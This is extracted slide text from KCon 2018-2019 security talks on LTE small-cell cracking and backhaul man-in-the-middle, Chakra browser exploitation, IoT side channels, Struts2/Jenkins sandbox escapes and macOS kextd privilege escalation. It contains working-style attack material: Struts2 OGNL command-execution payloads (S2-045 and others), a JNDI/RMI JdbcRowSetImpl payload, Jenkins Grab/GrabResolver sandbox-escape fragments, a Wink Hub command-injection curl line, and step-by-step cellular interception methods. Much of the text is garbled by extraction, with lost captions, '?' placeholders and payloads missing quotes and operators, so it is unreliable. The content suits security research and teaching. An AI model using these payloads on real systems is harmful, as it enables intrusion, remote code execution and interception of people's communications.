

2018-2019 KCon hacker conference: collection of speakers' presentation slides (2018-2019年KCon黑客大会嘉宾演讲PPT合集.rar), extracted text



Talk 1: 4G/LTE small cell cracking and man-in-the-middle attacks (2019, Shandong Haitian Software Engineering College)

Contents: Part 01 About the speaker; Part 02 Trends in communications security research; Part 03 Small cell cracking; Part 04 Man-in-the-middle attacks on the backhaul; Part 05 Security recommendations.

Part 02 Trends in communications security research

Evolution of mobile communications technology (slide table; the delay row is assumed to align with 2G to 5G):

| Generation | 3GPP Releases | Era | Services | Data rate | Delay |
| 1G | - | 1980s | Analog voice | 0 | - |
| 2G | - | 1990s | Digital voice, messages | 100 kbps (GPRS) | 500 ms |
| 3G | 4-7 | 2000s | WB voice, packet data | 10 Mbps (HSPA) | 100 ms |
| 4G | 8-9, 10-14 | 2010s | Voice, video, Internet, apps | 100+ Mbps (LTE/LTE-A) | 10s of ms |
| 5G | 15, 16 | 2020s | Everything, devices | 10 Gbps (NR) | 5 ms |

Trends in communications security research:
- Systematisation: protocol standards, implementation, deployment and operations; end to end; all scenarios, including complex combinations of conditions.
- Modelling: protocols expressed symbolically and logically.
- Automation: fuzzing.

Finding communications security weaknesses more efficiently:
- The protocol itself: think systemically, cover the protocol and its interactions with other protocols, build a symbolic logic model, automatically traverse the combinations looking for unexpected results (needs modelling and automation tools), then analyse and verify (needs a lab environment).
- The protocol implementation: build test cases for the protocols used by the device under test, combined with the application scenario (needs modelling and the development of automation tools based on finite state machines); run the test cases (needs a lab) to find unexpected results; analyse the weaknesses that could be exploited and verify them in practice (needs a lab).
- Engineering and operations: build test cases from the compliance angle and from the attacker's perspective; run the test tools routinely at acceptance and during operations to assess the environment (needs test tools; developing them needs a lab).

Foundations of communications security research: a communications security lab
- FOSS + SDR: essential; automated test tools and network attack tools are developed on FOSS.
- Mainstream commercial equipment: security-test commercial gear; rehearse attack and defence on a real commercial network; do binary research on commercial equipment and build attack tools.
- Mainstream UEs; 5G should be supported by 2020.

LTE network architecture and data flow (protocol stack figure): UE to eNB over Uu (NAS, RRC, PDCP, RLC, MAC, PHY); eNB to MME over S1-MME (NAS, S1AP, SCTP, IP, L1/L2); eNB to SGW over S1-U (GTP-U, UDP, IP, L1/L2); SGW to PGW over S5/S8 (GTP-U and GTP-C over UDP/IP); MME to SGW over S11 (GTP-C); MME to HSS over S6a (Diameter, SCTP/TCP, IP); PGW to PCRF over Gx (Diameter); PGW to PDN, IMS and the Internet over SGi. The figure distinguishes signalling interfaces and flows from data interfaces and flows.

LTE lab, basic edition:
- UE: FOSS UE: PC notebook + Ubuntu + srsUE/OAI UE + SDR (USRP B210/X310); COTS UE: Android phone, iOS iPhone, 4G modem.
- eNodeB: FOSS eNodeB: PC server + Ubuntu + OAI/srsLTE + SDR (USRP B210/X310); COTS eNodeB: Huawei BBU3910 + pRRU3912 + RHUB3908 + ETP48100; COTS HeNB: ZTE, Ericsson, Comba.
- EPC: FOSS EPC: PC server + Ubuntu + OpenAir-CN/srsEPC/NextEPC + Kamailio/OpenIMS/Clearwater.
- SeGW: FOSS IPsec server: PC server + Ubuntu + strongSwan.
- ACS: FOSS ACS: PC server + Ubuntu + GenieACS.

Personal LTE/4G lab: EPC: Gigabyte Brix i7-5500, 16 GB RAM; eNodeB/RRU: UP Board + USRP B210/B200mini, ThinkPad T440s + bladeRF/LimeSDR; UE: Samsung, iPhone, OnePlus, ZTE, etc.

Structure of a mixed 2G/3G/4G network; main interfaces and protocols of the mobile network (figures).

GTP message types:

| Type | Example message | Direction |
| Path management | Echo Request, Echo Response | |
| Tunnel management | Create Bearer Request | PGW to SGW, SGW to MME/S4-SGSN |
| | Create Bearer Response | MME/S4-SGSN to SGW, SGW to PGW |
| | Modify Bearer Request | MME/S4-SGSN to SGW, SGW to PGW |
| | Modify Bearer Response | PGW to SGW, SGW to MME/S4-SGSN |
| | Delete Bearer Request | PGW to SGW, SGW to MME/S4-SGSN |
| | Delete Bearer Response | MME/S4-SGSN to SGW, SGW to PGW |
| Mobility management | Identification Request | new MME/SGSN to old MME/SGSN |
| | Identification Response | old MME/SGSN to new MME/SGSN |

GTP-C/GTP-U runs over UDP/IP/L2/L1 on S1-U, S3, S4, S11 and S12. GPRS Tunneling Protocol: a UDP-based tunnelling protocol used to carry network packets inside the telecom network.

S1-AP (1): S1-AP over SCTP/IP/L2/L1 on S1-MME. An SCTP-based signalling protocol between the base station and the MME (S1-MME interface). It provides: S1 Paging; S1 UE Context Management; Initial Context Setup; UE Context Modification; Mobility Functions for UEs in ECM-CONNECTED; E-RAB Service Management; NAS Signalling Transport; NAS Node Selection; S1-interface management; MME Load balancing; Location Reporting; Warning Message Transmission; Overload; RAN Information Management; S1 CDMA2000 Tunnelling; Configuration Transfer; LPPa Signalling Transport; Trace.

S1-AP (2): elementary procedures with a response message (initiating message / successful outcome / unsuccessful outcome):

| Handover Preparation | HANDOVER REQUIRED | HANDOVER COMMAND | HANDOVER PREPARATION FAILURE |
| Handover Resource Allocation | HANDOVER REQUEST | HANDOVER REQUEST ACKNOWLEDGE | HANDOVER FAILURE |
| Path Switch Request | PATH SWITCH REQUEST | PATH SWITCH REQUEST ACKNOWLEDGE | PATH SWITCH REQUEST FAILURE |
| Handover Cancellation | HANDOVER CANCEL | HANDOVER CANCEL ACKNOWLEDGE | |
| SAE Bearer Setup | SAE BEARER SETUP REQUEST | SAE BEARER SETUP RESPONSE | |
| SAE Bearer Modify | SAE BEARER MODIFY REQUEST | SAE BEARER MODIFY RESPONSE | |
| SAE Bearer Release | SAE BEARER RELEASE COMMAND | SAE BEARER RELEASE COMPLETE | |
| Initial Context Setup | INITIAL CONTEXT SETUP REQUEST | INITIAL CONTEXT SETUP RESPONSE | INITIAL CONTEXT SETUP FAILURE |
| Reset | RESET | RESET ACKNOWLEDGE | |
| S1 Setup | S1 SETUP REQUEST | S1 SETUP RESPONSE | S1 SETUP FAILURE |
| UE Context Release | UE CONTEXT RELEASE COMMAND | UE CONTEXT RELEASE COMPLETE | |
| UE Context Modification | UE CONTEXT MODIFICATION REQUEST | UE CONTEXT MODIFICATION RESPONSE | UE CONTEXT MODIFICATION FAILURE |
| eNB Configuration Update | ENB CONFIGURATION UPDATE | ENB UPDATE CONFIGURATION ACKNOWLEDGE | ENB CONFIGURATION UPDATE FAILURE |

S1-AP (3): elementary procedures without a response (procedure: message):
- Handover Notification: HANDOVER NOTIFY
- SAE Bearer Release Request: SAE BEARER RELEASE REQUEST
- Paging: PAGING
- Initial UE Message: INITIAL UE MESSAGE
- Downlink NAS Transport: DOWNLINK NAS TRANSPORT
- Uplink NAS Transport: UPLINK NAS TRANSPORT
- NAS non delivery indication: NAS NON DELIVERY INDICATION
- Error Indication: ERROR INDICATION
- UE Context Release Request: UE CONTEXT RELEASE REQUEST
- Downlink S1 CDMA2000 Tunneling: DOWNLINK S1 CDMA2000 TUNNELING
- Uplink S1 CDMA2000 Tunneling: UPLINK S1 CDMA2000 TUNNELING
- UE Capability Info Indication: UE CAPABILITY INFO INDICATION
- eNB Status Transfer: eNB STATUS TRANSFER
- MME Status Transfer: MME STATUS TRANSFER
- Deactivate Trace: DEACTIVATE TRACE
- Trace Start: TRACE START
- Trace Failure Indication: TRACE FAILURE INDICATION
- Location Reporting Control: LOCATION REPORTING CONTROL
- Location Reporting Failure Indication: LOCATION REPORTING FAILURE INDICATION
- Location Report: LOCATION REPORT

Diameter commands:

| Command name | Abbreviation | Command code |
| Update-Location-Request | ULR | 316 |
| Update-Location-Answer | ULA | 316 |
| Cancel-Location-Request | CLR | 317 |
| Cancel-Location-Answer | CLA | 317 |
| Authentication-Information-Request | AIR | 318 |
| Authentication-Information-Answer | AIA | 318 |
| Insert-Subscriber-Data-Request | IDR | 319 |
| Insert-Subscriber-Data-Answer | IDA | 319 |

Diameter runs over SCTP/IP/L2/L1 on S6a and Gx. Diameter, based on SCTP, is the base protocol plus a set of applications for AAA (authentication, authorization and accounting). The base protocol provides the basic mechanisms for reliable transport, message delivery and error handling. Between the PGW and the PCRF, Diameter carries the subscriber's QoS rules and charging rules. Between the MME and the HSS, Diameter performs authentication, authorization, location management and subscriber data management. The main messages are: authentication messages, which check the legitimacy of the subscriber; location update messages, which record or update the subscriber's location; HSS-initiated purge of the subscriber record in the MME; HSS-initiated insertion of subscription data; HSS-initiated deletion of all or part of the subscriber data held in the MME; the MME notifying the HSS to delete the subscription data and MM context of a detached subscriber; and, when the subscriber state changes, the terminal changes, or the P-GW information for the subscriber's current APN (access point name) changes, a notify request from the MME to the HSS.

Ever smaller base stations. Why study small cells: 5G will bring large numbers of small cells; small cells are weakly secured; small cells are easy to attack. Why study the backhaul: backhaul security has never received attention; the backhaul is easy to reach physically; a compromised backhaul does great damage. Why study and implement man-in-the-middle attacks: a MITM can conveniently eavesdrop on, tamper with and forge communications; it is the basis for more advanced and deeper attacks; being able to MITM a specific target is the mark of controlling the communications network.

Attack surface of the mobile network (figure): air interface, access network, core network, operator interconnect; modem baseband, vendor OTA, WiFi/BT baseband, SIM card, IPv6, WiFi network.

MITM based on 4G/LTE. Goals: SMS: eavesdrop and, where necessary, intercept, tamper with or forge messages; voice: eavesdrop and, where necessary, block or forge calls; data: eavesdrop and, where necessary, block, tamper with or forge data traffic. Means: on the air interface, an LTE relay built on a rogue base station plus packet tampering (aLTEr), or packet tampering by subframe signal overwrite (SigOver); in the access network, MITM on a cracked base station using Netfilter, or MITM through a device implanted in the backhaul (Hacking Box of S1).

Basic techniques for LTE air interface attacks: LTE relay; tracking each user's packets; user-plane packet tampering; SigOver subframe overwrite; EIA0; rogue base station plus signalling network; femtocell; RRC redirection. Tracking a specific UE's communication (slide): the UE sends an RRC connection request (with TMSI); the C-RNTI is used to filter out this specific request; find the uplink transmission with the corresponding C-RNTI; match the C-RNTI and the TMSI.

Packet tampering, DNS-based MITM (as presented):
1. Deploy an LTE relay. One end acts as the target phone towards the live base station, the other acts as the live base station and attracts the target phone; the two ends can be in different places and relayed over the Internet.
2. Mutual authentication between the target phone and the live base station completes successfully.
3. User data packets between phone and base station are encrypted with ZUC or AES-CTR; both are stream ciphers based on XOR.
4. The relay identifies DNS request packets, changes the DNS server address to a malicious DNS server set up in advance, and adjusts certain fields so the packet checksum is valid; the modified packet is then sent to the live base station.
5. After receiving the DNS response from the live base station, the source IP is changed back to the original DNS server and the modified packet is sent to the target phone.

Subframe signal overwrite, packet tampering (as presented):
1. Clone a nearby live base station, including its TAC and PCI, keep clock synchronisation, but do not transmit.
2. Track the communication between that base station and the UE, and transmit at a specific moment, injecting an assembled subframe.
3. With a transmit signal far stronger than the live base station, the subframe is overwritten (signal overwrite).
4. Subframe overwrite makes packet tampering possible.
5. Provided the target phone's (or base station's) receive subframe and cipher mode are known in advance, this can be used for a MITM attack. SigOver has a high success rate.

Summary of LTE air interface attacks: passive: sniffing (no encryption / key from the core network / key from the SIM card); active: MITM via femtocell, small cell or rogue base station; MITM via LTE relay plus encrypted packet tampering or EIA0; semi-active: SigOver subframe signal overwrite.

Weaknesses and attack methods in the access network (RAN): eNodeB: easy physical access; default LMT password; binaries can be analysed and programs injected into the file system. HeNB: easy physical access; all can be rooted; firmware can be changed. Backhaul: most have no IPsec protection, so plaintext eavesdropping; MITM possible.

Base station types: small cell = pico cell + femto cell; macro cells lacking physical protection. Portable macro-cell penetration kit: Huawei BBU local maintenance cable; Huawei WiFi2 Pro portable router; GPD Win handheld PC.

Part 03 Small cell cracking

Every femtocell can be cracked. Why small cell security matters: 5G runs on higher bands, where the penetration of traditional macro cells weakens, so small cells will fill the gaps in macro coverage; 4G already has a large number of small cells for deep indoor coverage, more than 1.5 million units; 5G will deploy even more, possibly one per household, in a trend to replace WiFi; small cells are close to users and easy to reach physically and crack. What you can see after cracking a small cell: SMS (SMS over NAS; SMS over IMS); VoLTE calls (SIP, AMR); data traffic (GTP-U); personal information: IMSI, and for VoLTE the phone numbers (MSISDN) of people nearby, IMEI, Cell-ID, IP, location; an advanced IMSI catcher.

LTE picocells: Ericsson ENC-nRBS01 (needs no cracking at all); Comba ENB-35 (cracked); ZTE BS8102 (cracked); Huawei BTS3203; Datang fbs3211/3221. Femtocells bought online (1) China Mobile: GSM: Comba HNB-10; TD-SCDMA: Comba HNB-33, Bowei HN1200; TD-LTE: ZTE BS8102 T2300, Comba ENB-35, Huawei BTS3203, Datang fBS3211, Ericsson ENC-nRBS01, Bangxun BSNAP-300, Sunnada LNC-2000E, Sanwei SeNB2001. (2) China Unicom: WCDMA: Huawei UAP2105/UAP2816/UAP2835/ePico3801/ePico3802; FDD LTE: ZTE BS8102 L1800/L2100. (3) China Telecom: CDMA: Huawei ePico3680; FDD LTE: ZTE BS8102 L1800.

Rooting a femtocell: choose a working 3G/4G femtocell; a femtocell whose SeGW or SIM card no longer works may carry old firmware; obtain root; break IPsec; sniff traffic; MITM the traffic; connect to the operator's core network and carry out signalling attacks. Hardware tools (1): digital multimeter, CP2102, Dupont wires, SEGGER J-Link, hot-air rework station. Hardware tools (2): Bus Pirate, JTAGulator, NAND/NOR flash programmer with TSOP48/56 socket. Software tools: TR-069 server (GenieACS, XACS) to upload firmware, downgrade to old or modified firmware, and upload or modify certain configuration; IDA Pro, Ghidra, QEMU, OpenOCD, Binwalk, firmware-mod-kit, hex editor.

MITM after cracking a small cell. Attack program running on the small cell: stealthy and hard to notice; the small cell has a low specification, with limited CPU, memory and storage; a compromise option when the small cell has IPsec enabled. Attack program running on a device implanted in the backhaul: if the small cell has IPsec enabled, an IPsec MITM must be achieved first; relatively complex MITM attacks are possible; the various application servers used for MITM can run there; connections are redirected by DNS and IP to attack servers set up in advance. Portable small cell, carried in person: stays portable, fits in a backpack; mobile 12 V power; Internet access through a portable WiFi router with an RJ-45 port (Huawei WiFi2 Pro); the backhaul access point must be reachable from the Internet.

Part 04 Man-in-the-middle attacks on the backhaul

Small cell backhaul: based on xPON (GPON, EPON): twisted pair to the ONU; based on PTN or IP RAN: fibre, or twisted pair to a fibre media converter; based on the Internet: twisted pair. Protocols on the backhaul: user data: GTP-U; signalling: SCTP, the S1-AP protocol from the eNodeB to the MME; O&M data: HTTP; may be protected by IPsec (from the eNodeB to the SeGW), which is uncommon.

LTE protocols and ports of interest:

| Source | Destination | Protocol | Source port | Destination port |
| eNodeB | S-GW | GTP-U/UDP | 2152 | 2152 |
| S-GW | eNodeB | GTP-U/UDP | 2152 | 2152 |
| eNodeB | eNodeB | GTP-U/UDP | 2152 | 2152 |
| eNodeB | MME | S1AP/SCTP | 36412 | 36412 |
| MME | eNodeB | S1AP/SCTP | 36412 | 36412 |
| eNodeB | eNodeB | X2AP/SCTP | 36412 | 36412 |

Backhaul weaknesses: IPsec is optional. 3GPP TS 33.401: "In case the S1 management plane interfaces are trusted (e.g. physically protected), the use of protection based on IPsec/IKEv2 or equivalent mechanisms is not needed". The problem is that the transmission link before the ONU is not secure. In practice, the vast majority of base stations do not enable IPsec (encryption and mutual authentication).

The backhaul MITM program: implanted as a dual-NIC device on the backhaul link; MITM on user data (GTP-U), including VoLTE SMS and calls; MITM on signalling (S1AP), including SMS over NAS; a base station access proxy that can connect multiple rogue base stations, with signalling aggregated so the core network cannot tell. Backhaul MITM, user data: GTP-U decapsulation and encapsulation; mapping TEIDs to users; one way of implementing MEC. Backhaul MITM, signalling: the S1-AP protocol; SCTP proxy; SCTP aggregation.

The backhaul implant (Hacking Box of S1): dual gigabit NICs; USIM slot; remotely accessible through a 4G module; can connect multiple base stations; 12 V DC supply; runs the S1 MITM program. Two modes of the Hacking Box of S1. Transparent mode: MITM possible; no change to the eNodeB configuration needed; does not support multiple eNodeBs; does not support IPsec. Gateway mode: more complex MITM possible; requires changing the eNodeB configuration so the MME IP address points at the HBOS; equivalent to an S1-AP signalling gateway, supporting multiple eNodeBs; aggregates multiple SCTP connections into one and registers the eNodeB only once, so the core network sees a single eNodeB; supports IPsec. Demo.

Part 05 Security recommendations: hardening small cells; securing the backhaul. Thank you. Speaker: Seeker.

Talk 2: Extending APT detection appliances (Meituan, 2019)

Team: Zhu Xuewen (Ju Zhu), Meituan, senior security researcher; 9+ years of security research; 7+ years mainly on advanced threats, including 0-day, n-day and vulnerability discovery; long committed to hunting in-the-wild advanced threats with automated systems; multiple CVEs, with acknowledgements from Google, Apple, Facebook and other vendors; invited speaker at BlackHat, CodeBlue, CSS and other top security conferences at home and abroad. Guo Mengyuan (Mabel Guo), Shanghai Jiao Tong University / Meituan intern security researcher; master's student at Shanghai Jiao Tong University; graduate research on video steganography and steganalysis; skilled in iOS reverse engineering and

virtualization technology.

Contents: Part 01 Comparison of appliance choices; Part 02 Comparison of solutions; Part 03 iOS dynamic sandbox; Part 04 Some practice.

Part 01 Comparison of mainstream APT detection appliances: overview; platform support; file type support; statistics of device types connected to the intranet; BYOD (Bring Your Own Device). Platform support (Windows, macOS, iOS, Android, other) compared across vendor 1, vendor 2 and vendor 3; Win7, Win10, 32-bit and 64-bit; custom import. File type support (PE, Office, PDF, Mach-O, plist, APK) compared across vendor 1, vendor 2 and vendor 3.

Mach-O: virtual memory VMP attributes; import the dependent libraries; emulated implementation (for example Foundation.framework); run; find the entry address (for example the main function) from Load Commands LC_MAIN: absolute address = entry address + slide + text_vm_addr. Address fixups (rebase data) for Lazy Symbol Pointer and CFString, old data (pointer) to new data (pointer): Lazy Symbol Pointer 0x100007F9C becomes slide + 0x100007F9C; CFString 0x100007FA8 becomes slide + 0x100007FA8. Address (API) redirection: Lazy Symbol Pointer data, NSLog redirected to libFoundation.so. API redirection flow; complete run flow; callback flow; deployment; better adaptation; ODM (Original Design Manufacturer). Part 04 Some practice. Thank you. Speaker: Zhu Xuewen (Ju Zhu).

Talk 3: Chakra exploitation (title and speaker name lost in extraction)

Who am I. Contents: 1 Chakra vulnerability; 2 Bypass ASLR & DEP; 3 Bypass CFG; 4 Bypass CIG; 5 Bypass ACG; 6 Exploit; 7

Q&A.

The vulnerability was discovered on May 31, 2016 and fixed in February 2017.

NativeIntArray struct (figure): NativeIntArray holds a head segment pointer; each segment has left, length, size and a next-segment pointer, followed by its buffer; the array also carries a length.

Make the var_Array_1 object reach a special state: make var_Array_1.length smaller, so that Array.length < head.next.left + head.next.length, i.e. 0x2e < 0x03d2 + 0x2e. Layout at this point: segment head: left 0x00000000, length 0x00000000, size 0x00000012; segment head.next: left 0x000003d2, length 0x0000002e, size 0x0000002e; buffers of 0x12*4 and 0x2e*4 bytes; NativeIntArray head length 0x0000002e. A callback function causes the length to be modified, but the ReverseHelper function still uses the old length.

Step 1: make head.size smaller. var_Array_1.head.size goes from 0x2e to 0x23, so head.size 0x23 < head.length 0x2e. Layout: head: left 0x00000000, length 0x0000002e, size 0x00000023; head.next: left 0x00000023, length 0x0000000b, size 0x00000012; buffers 0x2e*4 and 0x12*4; head length 0x0000002e. seg.left = 0; seg.EnsureSizeInBound(): seg.size = 0x23; Min(Next.left, Size) = Min(0x2e, 0x23).

Step 2: create the OOB. ConvertToJavascriptArray creates a new segment with Seg.buffer = 0x23*0x08 and Seg.length = 0x2e. Layout: head (OOB): left 0x00000000, length 0x0000002e, size 0x00000023, buffer 0x23*8; head.next: left 0x00000023, length 0x0000000b, size 0x00000011, buffer 0x11*4; OOB region 0x0b*0x08; JavascriptArray head length 0x0000002e.

Step 3: segment layout and segment OOB. Array 1 segment head: left 0x00000000, length 0x0000002e, size 0x00000023, buffer 0x23*8. Array 2 segment head: left 0x00000023, length 0x0000000b, size 0x23; OOB write.

Step 4: edit var_Array_2.head.size. Through the OOB write, Array 2's head segment becomes: left 0x00000023, length 0x0000000b, size 0xffffffff; its head.next: left 0x00000023, length 0x0000000b, size 0x00000011, buffer 0x11*4; value 0x7fffffff.

Step 5: var_Array_2 OOB read/write. Array 2 segment head: left 0x00000000, length 0x0000000b, size 0xffffffff, buffer 0x23*8; OOB 0xffffffff*8.

Step 6: full memory read/write. Inline head: edit NativeIntArray.length, NativeIntArray.head.length and NativeIntArray.size. Figure: OOB segment reaches a NativeIntArray object in memory; editing array.length, array.head.size and array.head.length gives out-of-bound memory read/write. DataView.

2 Bypass ASLR & DEP: module address and object address; ROP; VirtualProtect; VirtualAlloc. (Slide body lost in extraction.)

3 Bypass CFG: Control Flow Guard (CFG) bitmap (slide; most captions lost in extraction): index, offset: data. 0x0077b960 0x01dee58c: 0x55555555; 0x0077b964 0x01dee590: 0x30010555; 0x0077b968 0x01dee594: 0x04541041. bt: 0x30010555 & 0x400 != 0; 00000100 00000000 = 0x400; 01010 = 0x0a = 10. Function address 0x77b96450 = 01110111 10111001 01100100 01010000. Leak a stack address; find the return address of a specific function; modify the function's return address; control RIP.

4 Bypass CIG: Code Integrity Guard (CIG): only properly signed DLLs are allowed to load by a process (reference: us-14-Yu-Write-Once-Pwn-Anywhere). "LoadLibrary" in shellcode: load the DLL file into memory, parse the PE header, reload sections, fix the import table, rebase. Elevation of privilege is quite complex; shellcode is reusable; privilege escalation and sandbox escape can live in a DLL.

5 Bypass ACG: two general ways to load malicious native code into memory: load a malicious DLL/EXE from disk, or dynamically generate code. CIG blocks the first way: only properly signed DLLs are allowed to load by a process, and child processes cannot be created (Windows 10 1607). ACG blocks the second way: code pages are immutable, and new, unsigned code cannot be created. Arbitrary Code Guard (ACG). Leverage valid signed code in an unintended way: ROP (return oriented programming) can construct a full payload and call API functions. Example: no need for shellcode, just like C code.

6 Exploit: demo. 7 Q&A.

Talk 4: IoT security: side channels in practice (2019)

Agenda: a bit about side channels; brief case analysis; side channels and

power analysis.

A bit about side channels. A side-channel attack is an unconventional attack that targets flaws in the design of software or hardware. The attack path usually relies on passive monitoring, or on sending covert data signals through special channels. The point of attack is not brute force; the break is achieved through power consumption, timing, electromagnetic leakage and the like. In many physically isolated environments it can still succeed unexpectedly. Typical hardening that side channels get around (slide): public key signature check; bootloader hardening (bootdelay=0); disabled debug ports (UART, JTAG, SPI, I2C); complete physical isolation of electronic devices (air gapping). Side-channel examples (slides): WordPress; Drupal; access control systems.

Passive cases: acoustic signal capture to recover what a printer printed; US NSA electromagnetic monitoring (TEMPEST); power analysis breaking the South Korean transit card key system (3DES); power analysis recovering the key of the Philips Hue smart lighting system (AES). Active cases: Xbox 360 glitch attack (running unsigned code); NAND glitch on the Hue smart gateway (root access); glitch injection extracting sensitive data from the flash of the Trezor hardware wallet; Israel's Ben-Gurion University sending electromagnetic signals over USB (USBee).

Brief case analysis: timing analysis; NAND glitch. IoT device gateway (Wink Hub) accessed through a web page (set_dev_value.php), as shown on the slide:
curl "192.168.01/set_dev_value.php" -d "nodeId=a&attrId=;uname -a;"
NAND glitch: NAND flash usually stores the firmware, bootloader, kernel and root files. Using a wire, short an I/O pin at the instant the system boots and reads the kernel from NAND; at the right moment this stops the bootloader from reading the correct kernel data and drops into a shell.

Side channels: power analysis. Power analysis (simple and differential): the processor's power draw differs between instructions; the cryptographic algorithm used by the target device must be known; the signal must be captured during encryption or decryption. Power analysis with ChipWhisperer: designed and built by Colin O'Flynn, a tool for learning SCA power analysis and glitch injection; a Python-based, cross-platform open-source hardware and software project (Windows, Linux, macOS); usable for clock or voltage glitch injection tests (e.g. producing an infinite loop); look for differences in the target's power trace at specific moments (encryption/decryption). Power analysis (SPA); power analysis (DPA): target device, measurement method, measurement results; DPA against AES-128. Power analysis (electromagnetic signal): electromagnetic waves can be picked up remotely with an H-field probe and software-defined radio; 0/1 transitions in the chip leak electromagnetic waves into the air that contain a fingerprint of the key; researchers at Tel Aviv University recovered GnuPG key material by measuring and analysing electromagnetic emissions. One more thing: side channels and EMFI (slides).

Summary: a 100% secure system does not exist; side-channel analysis and defence are essential hardware security skills; a perfect design with a single lapse in implementation can bring the whole system down. Thank you.

Talk 5: Struts2 OGNL and Jenkins Groovy sandboxes (title and most Chinese captions lost in extraction; they appear as "?" below)

Contents: Part 01; Part 02; Part 03; Part 04. Part 01: 1, 2, 3; SecurityManager; 2, 3;

SecurityManager. Part 02: SecurityMemberAccess.

Struts configuration constant (slide): constant name=struts.excludedClasses value=java.lang.Object,java.lang.Runtime,java.lang.System,java.lang.Class,java.lang.ClassLoader,java.lang.Shutdown,java.lang.ProcessBuilder,ognl.OgnlContext,ognl.ClassResolver,ognl.TypeConverter,ognl.MemberAccess,ognl.DefaultMemberAccess,com.opensymphony.xwork2.ognl.SecurityMemberAccess,com.opensymphony.xwork2.ActionContext

1 ?; 2 isAccessible ?; 3 struts-default.xml. Struts2 advisories: S2-001, S2-014, S2-032, S2-045, S2-057.

Payload text as extracted from the slides (quoting marks and operators were lost in extraction; kept as extracted):
(#p=new java.lang.ProcessBuilder(calc).(#p.start()
(#_memberAccessallowStaticMethodAccess=true).(java.lang.RuntimegetRuntime().exec(calc)
(#container=#contextcom.opensymphony.xwork2.ActionContext.container).(#ognlUtil=#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass).(#ognlUtil.excludedClasses.clear().(#ognlUtil.excludedPackageNames.clear().(#context.setMemberAccess(ognl.OgnlContextDEFAULT_MEMBER_ACCESS).(java.lang.RuntimegetRuntime().exec(calc)
(#_memberAccess=ognl.OgnlContextDEFAULT_MEMBER_ACCESS).(java.lang.RuntimegetRuntime().exec(calc)
S2-045 PAYLOAD: $(#c=#requeststruts.valueStack.context).(#container=#ccom.opensymphony.xwork2.ActionContext.container).(#o=#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass).(#o.getExcludedClasses().clear().(#o.getExcludedPackageNames().clear().(#dm=ognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#c.setMemberAccess(#dm).(#cmd=(calc).(new java.lang.ProcessBuilder(#cmd).start()
S2-057 PAYLOAD.

OgnlContext (slide): public class OgnlContext extends Object implements Map; public static final String CONTEXT_CONTEXT_KEY=context; public static final String ROOT_CONTEXT_KEY=root; public static final String THIS_CONTEXT_KEY=this; public static final String MEMBER_ACCESS_CONTEXT_KEY=_memberAccess. In the later version: public class OgnlContext extends Object implements Map; public static final String ROOT_CONTEXT_KEY=root; public static final String THIS_CONTEXT_KEY=this.

S2-045 vs S2-057 ?; Ognl ?; Ognl ?; S2-057 ?: (#c=#requeststruts.valueStack.context).(#container=#ccom.opensymphony.xwork2.ActionContext.container). S2-045 ?: (#container=#contextcom.opensymphony.xwork2.ActionContext.container). 1 #context ?; 2 request.getAttribute(struts.valueStack); 3 OgnlValueStack ? context.

PoC / demo result (as extracted): (#jdbc=new com.sun.rowset.JdbcRowSetImpl().(#jdbc.setDataSourceName(rmi:/127.0.0.1:1099/Exploit).(#jdbc.setAutoCommit(true) and (#n=#requeststruts.actionMapping.namespace.substring(0,1).(#rmi=rmi:+#n+#n+127.0.0.1:1099+#n+Exploit).(#jdbc=new com.sun.rowset.JdbcRowSetImpl().(#jdbc.setDataSourceName(#rmi).(#jdbc.setAutoCommit(true). Demo.

Part 03: Jenkins script security. SandboxInterceptor ?; intercepted operations: method invoke, new instance, static method, set property, get property, set attribute, get attribute, super call, set array, get array. Security-1266/CVE payload: 1 ?; 2 Java ?; 3 ?. Advisories: SECURITY-1266, SECURITY-1292, SECURITY-1318, SECURITY-1319, SECURITY-1320, SECURITY-1321. Annotation-based payload fragments as extracted: Grab(group=foo,module=bar,version=1.0); Grapes(Grab(group=foo,module=bar,version=1.0)); GrabResolver(name=restlet.org,root=http:/maven.restlet.org); groovy.transform.ASTTest(value=assert Jenkins.getInstance().createProject()); AnnotationCollector(ASTTest) interface Lol; Lol(value=import groovy.transform.ASTTest as lolwut; lolwut(value=)).

Part 04: Oracle ?; Java ?; Java ?.

Talk 6: macOS, from runtime library hijacking to kernel privilege escalation

Contents: Part 01 Attack Surface; Part 02 Root Cause; Part 03 Exploit; Part 04 Mitigation.

Why a kernel exploit: to overcome or disable System Integrity Protection (rootless): file system

protection (/System), attaching to Apple-signed processes, enforced signature validation for KEXTs; deploy rootkits; gain more pwn points. Motivation and general approach: attack a kernel mode driver or XNU to control $pc, then disable SIP in kernel mode. Think outside the box: is memory corruption always necessary? Does the target have to be the kernel itself or kernel mode drivers? What about a user space SIP bypass to gain kernel privilege?

Part 01 An Attack Surface

Old days with kext_tools: patch kextd (osxreverser, Nov 2013); custom build of kextload (patrickwardle, BlackHat US 2015). Project Zero issues:
- Issue 676: Logic error when exec-ing suid binaries allows code execution as root on OS X/iOS (CVE-2015-3708). User mode only, logic.
- Issue 353: OS X kextd bad path checking and toctou allow a regular user to load an unsigned kernel extension (CVE-2015-3709). User mode only, logic.
- Issue 1520: MacOS double mach_port_deallocate in kextd due to failure to comply with MIG ownership rules (CVE-2018-4139). User mode only, MIG lifetime.
Arbitrary code execution in kextd = kernel code execution. kextload, kextd, XNU: it doesn't matter which.

What makes kextd so special: its entitlement. An entitlement is a bundle resource containing key-value pairs that grant the executable permission to use an app service or technology; a property list (XML serialized) embedded in the executable's code signature. Some entitlements are for Apple-signed binaries only: "taskgated: killed app because its use of the com.apple.* entitlement is not allowed". jtool -ent /usr/libexec/kextd -arch x86_64 shows: com.apple.private.KextAudit.user-access, com.apple.private.allow-bless, com.apple.private.kernel.get-kext-info, com.apple.rootless.kext-secure-management, com.apple.rootless.storage.KernelExtensionManagement, com.apple.security.cs.allow-unsigned-executable-memory. These entitle it to call kext_request and to write /Library/StagedExtensions.

Checks by kextd/kextload/kextutil, implemented in the function authenticateKext of kext_tools: check bundle permission (must be owned by root and not writable by other groups); check the bundle signature (must be signed); during the loading process the bundle must be staged to a rootless-protected location, /Library/StagedExtensions (requires the com.apple.rootless.storage.KernelExtensionManagement entitlement); invoke syspolicyd to ask the user for approval to load a validly signed third-party extension (User-Approved Kernel Extension Loading, or SKEL). If SIP is disabled, some of the checks are skipped.

